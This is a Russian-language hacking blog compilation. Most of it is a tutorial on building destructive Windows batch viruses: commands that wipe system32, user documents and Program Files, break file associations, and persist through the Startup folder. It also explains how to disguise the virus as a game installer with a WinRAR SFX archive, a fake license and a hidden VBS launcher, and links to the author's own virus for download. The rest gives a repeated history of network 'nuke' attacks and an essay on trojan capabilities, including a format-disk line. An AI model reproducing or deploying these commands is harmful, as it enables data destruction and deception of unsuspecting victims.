WshShell.Run"C:sistem32Connect.bat ", 0, true
Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал
ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g
если чтото не поняли пишыте в коментарии я отвечу
узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).
В этой статье я научу вас
1.Ознокомлю с самыми злыми командами
2.Научу бат переделывать в exe
3.Предложу свою версию вируса
1.
Shutdown -t 0 –s -Эта команда выключает компютер
del *.* /q
После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:
del C:windowsfonts /q
Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:
del C:windowsMedia /q
Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.
del C:windowssystem32 /q /s
Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
del C:windows*.bmp /q /s
И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:
attrib -a -s -h -r C:*.*
del C:*.* /q
Но тут нам много удалить не дадут. Всё тристо раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:
rd %ProgramFiles% /s /q
А вот если написать:
rd C:Program Files /s /q
то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:
Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%Мои документы*.*" /q /s
--------------------------------------------------------------------------------
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251
--------------------------------------------------------------------------------
А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:
for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q
Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.
if not VIR*?????????.sys goto x
exit
:x
МУСОР.
Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.
--------------------------------------------------------------------------------
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.
rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска
chcp 1251
cd "%USERPROFILE%Главное менюПрограммы"
md 1 …и.т.д.
и папки будут создаваться в разделе программы.
Или допишите вот так…
chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
md 1 ….и.т.д.
допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…
Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…
assoc .lnk=.avi
здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!
assoc .exe=.avi
тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:
assoc .exe=
после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.
Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp
Можно путь для копирования поставить другой путь:
copy C:*.* C: program наш никчёмный файл появиться на диске С:
можно скопировать, что-нибудь другое:
copy C:windowssystem32*.* C:Microsoft*.exe
Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: "Создаём эффект программы" Есть другой способ копирования:
dir c: /s/a > C:/1.txt
Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:
copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK
Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)
А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.
xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.
--------------------------------------------------------------------------------
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
--------------------------------------------------------------------------------
Ах, совсем забыл, не пишите вот такую команду:
copy C:*.* C:Windows
А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.
Можно оповещать нашу жертву о ходе действия нашего вируса.
для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш
Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:
echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt
Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".
pause
Красивая оболочка
Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.
Первым делом открываем WinRAR (его можно скачать тут
http://www.rarlab.com
http://www.rarsoft.com)
Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!
Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).
--------------------------------------------------------------------------------
И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!
--------------------------------------------------------------------------------
В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.
На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».
На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:
Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!
На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит... хм... вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!
Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:
Chcp 1251
cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"
attrib +h
вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.
Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.
Но и тут есть запара жертва открывает вир видит выскакивает окно
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run"C:sistem32Connect.bat ", 0, true
Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал
ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g
если чтото не поняли пишыте в коментарии я отвечу
пʼятниця, 20 березня 2009 р.
Что такое Nuke
Словом Nuke (нюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.
В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).
7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.
В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.
В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.
Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)
В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).
7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.
В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.
В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.
Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)
Что такое трояны?
Дамы и господа! С опозданием на год я все-таки решил написать для Вас эту статью. Написать просто из уважения к Вам. Не в обиду будет сказано, но большинство так называемых "пользователей" персональных компьютеров на самом деле ОЧЕНЬ мало понимают работу САМИХ компьютеров. Дело даже не в том, что кто-то чего-то не знает... Скажите, зачем например, юристу, менеджеру, доктору наук или врачу ДОСКОНАЛЬНО знать все тонкости работы компьютера? У этих людей, как правило, своя специфика, они гораздо больше знают в другой области наук. Знать принципы работы компьютера, высшую математику, десяток языков программирования, сетевые протоколы, несколько операционных систем, принципы атаки и защиты на компьютеры этим людям совсем необязательно. Но по роду своих занятий, по своей работе такие люди вынуждены использовать вычислительную технику хотя бы потому, что это достаточно удобно. Но что именно удобно, благодаря чему использовать компьютеры стало удобно? Позволю себе высказать свою точку зрения. Если кто-то со мной не согласен, то мы обсудим это по e-mail.
Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...
Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).
А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...
Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...
Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).
Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.
Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.
Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.
Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?
Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".
Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.
Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...
Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...
Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:>nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.
Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...
Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)
Получение копии вашего экрана. Без комментариев.
Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)
Поменять кнопки мышки местами. (Тоже издевательство.)
Контроль координат курсора мыши (ой, мышка сама ездит???)
Открыть/закрыть CD-ROM. (Оооочень забавно...)
Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)
Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)
Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...
Узнать, какие программы у вас запущены.
Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)
Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)
Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)
Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)
Выключить или перезагрузить компьютер. (Без комментариев.)
Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)
Если у вас подключен микрофон, то можно услышать вас.
Если у вас есть Web-Camera, то можно и увидеть вас.
Если у вас слишком громко играет музыка, то можно ее вам убавить.
Или наоборот, проиграть на вашей машине звуковой файл...
А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.
Можно диалоговые окошки выводить. Вот такие, например...
Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.
Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...
Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???
В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).
Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...
Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...
Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)
Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.
Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.
А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.
Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...
Вот моя точка зрения, как дальше будут развиваться трояны:
1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.
2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.
